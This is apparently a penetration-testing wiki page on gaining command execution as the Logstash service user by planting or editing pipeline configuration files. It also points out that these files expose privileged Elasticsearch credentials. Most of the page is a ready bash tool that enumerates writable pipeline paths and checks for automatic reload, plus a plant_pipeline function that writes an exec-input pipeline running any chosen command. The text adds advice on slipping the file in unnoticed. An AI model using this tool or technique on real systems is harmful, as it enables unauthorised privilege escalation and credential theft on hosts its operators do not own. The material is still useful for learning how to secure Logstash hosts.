Logstash


Logstash

Logstash is used to collect, transform and ship logs through a mechanism called pipelines. Each pipeline consists of input, filter and output stages. This becomes interesting from an attacker's point of view when Logstash is running on a host you have already compromised: whoever controls the pipeline configuration controls what the Logstash service user executes.

Pipeline Configuration

Pipelines are declared in the file /etc/logstash/pipelines.yml, which points to the location of each pipeline's configuration:

# Define your pipelines here. Multiple pipelines can be defined.
# For details on multiple pipelines, refer to the documentation:
# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html

- pipeline.id: main
  path.config: "/etc/logstash/conf.d/*.conf"
- pipeline.id: example
  path.config: "/usr/share/logstash/pipeline/1*.conf"
  pipeline.workers: 6

This file reveals where the .conf files containing the pipeline configurations are located. When a pipeline uses the elasticsearch output plugin, its .conf file commonly embeds Elasticsearch credentials, and those accounts tend to be highly privileged because Logstash needs to write to (and usually create) indices, so the .conf files are worth reading on their own. A wildcard in path.config makes Logstash load every matching file in that directory as part of the pipeline, which means a newly created file that matches the glob is loaded as well.

Privilege Escalation via Writable Pipelines

To attempt escalation, first identify the user the Logstash service runs as, typically the logstash user. Then make sure one of the following holds:

  • You have write access to a pipeline .conf file, or

  • /etc/logstash/pipelines.yml uses a wildcard and you can write to the target directory

In addition, one of these conditions must be met, otherwise the planted configuration is never loaded:

  • You can restart the Logstash service, or

  • /etc/logstash/logstash.yml has config.reload.automatic: true set

If the configuration uses a wildcard, creating a file that matches it is enough to get command execution as the Logstash user, because the exec input plugin runs an arbitrary command on a schedule. For example:

input {
  exec {
    command => "whoami"
    interval => 120
  }
}

output {
  file {
    path => "/tmp/output.log"
    codec => rubydebug
  }
}

Here, interval sets how often the command runs, in seconds. In this example whoami is executed every 120 seconds and each run produces an event whose message field holds the command output; the file output writes those events, rendered with the rubydebug codec, to /tmp/output.log.

With config.reload.automatic: true in /etc/logstash/logstash.yml, Logstash polls the pipeline configuration (every config.reload.interval, 3s by default) and loads new or modified pipeline files automatically without a restart. If there is no wildcard, you can still edit an existing .conf, but do so carefully: a syntax error or a broken production pipeline is far more likely to be noticed than an extra file quietly appended to the glob.
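The following script ties the checks above together: it identifies the Logstash user, extracts every path.config entry from pipelines.yml, reports which entries give you a writable file or a writable wildcard directory, checks for automatic reload, and can plant an exec-input pipeline of the shape shown above. It is an added example written for this page, not code from the original or from Elastic; the default paths are the standard Logstash locations, and the planted file name 10-zz-exec.conf is an arbitrary choice made so it matches both the *.conf and 1*.conf globs from the sample pipelines.yml.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): enumerate and exploit the
# writable-pipeline conditions. Function arguments default to the standard
# Logstash paths; they are parameters only so the checks can be pointed at
# a test fixture.

# User the Logstash JVM runs as (normally "logstash"); empty if not running.
logstash_user() {
  ps -eo user:32=,args= 2>/dev/null |
    awk '/java/ && /logstash/ && !/awk/ {print $1; exit}'
}

# Print every path.config value from pipelines.yml, one per line, unquoted.
pipeline_paths() {
  local yml="${1:-/etc/logstash/pipelines.yml}"
  [ -r "$yml" ] || return 1
  awk -F'path.config:' '/^[ \t-]*path\.config:/ {
      v = $2; gsub(/^[ \t"]+|["\t ]+$/, "", v); print v }' "$yml"
}

# For one path.config entry, print how a pipeline could be planted:
#   WILDCARD_DIR_WRITABLE <dir>  glob entry whose directory we can write to
#   FILE_WRITABLE <file>         existing matching .conf we can overwrite
# Prints nothing when the entry offers no foothold. Assumes the wildcard is
# in the file name part of the path (as in the page's sample pipelines.yml).
writable_targets() {
  local p="$1" f dir
  case "$p" in
    *\**|*\?*)
      dir="${p%/*}"
      [ -w "$dir" ] && echo "WILDCARD_DIR_WRITABLE $dir"
      ;;
  esac
  for f in $p; do                     # unquoted on purpose: expand the glob
    [ -f "$f" ] && [ -w "$f" ] && echo "FILE_WRITABLE $f"
  done
  return 0
}

# Succeeds when logstash.yml enables automatic reload, so a planted pipeline
# is picked up without a service restart.
reload_automatic() {
  local yml="${1:-/etc/logstash/logstash.yml}"
  grep -Eq '^[[:space:]]*config\.reload\.automatic:[[:space:]]*true' "$yml" 2>/dev/null
}

# Write an exec-input pipeline into DIR. CMD runs as the Logstash user every
# INTERVAL seconds and the events are written to OUTFILE. Keep CMD free of
# double quotes. Prints the path of the planted file.
plant_pipeline() {
  local dir="$1" cmd="$2" interval="${3:-120}" outfile="${4:-/tmp/output.log}"
  local conf="$dir/10-zz-exec.conf"   # hypothetical name matching 1*.conf and *.conf
  cat > "$conf" <<EOF
input {
  exec {
    command => "$cmd"
    interval => $interval
  }
}
output {
  file {
    path => "$outfile"
    codec => rubydebug
  }
}
EOF
  echo "$conf"
}

# Read-only report against the live system (nothing is planted).
main() {
  local yml="${1:-/etc/logstash/pipelines.yml}" cfg="${2:-/etc/logstash/logstash.yml}" p
  echo "logstash runs as: $(logstash_user)"
  if ! pipeline_paths "$yml" >/dev/null; then
    echo "cannot read $yml"; return 0
  fi
  pipeline_paths "$yml" | while IFS= read -r p; do
    echo "pipeline entry: $p"
    writable_targets "$p"
  done
  if reload_automatic "$cfg"; then
    echo "config.reload.automatic: true (no restart needed)"
  else
    echo "no automatic reload: a service restart is required"
  fi
}

# Usage: bash ls_pipeline_check.sh --run
case "${1:-}" in --run) main ;; esac
```

Run the report first; only call plant_pipeline once you know which directory is matched by a glob and whether the pipeline will be reloaded automatically or needs a restart you can trigger.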
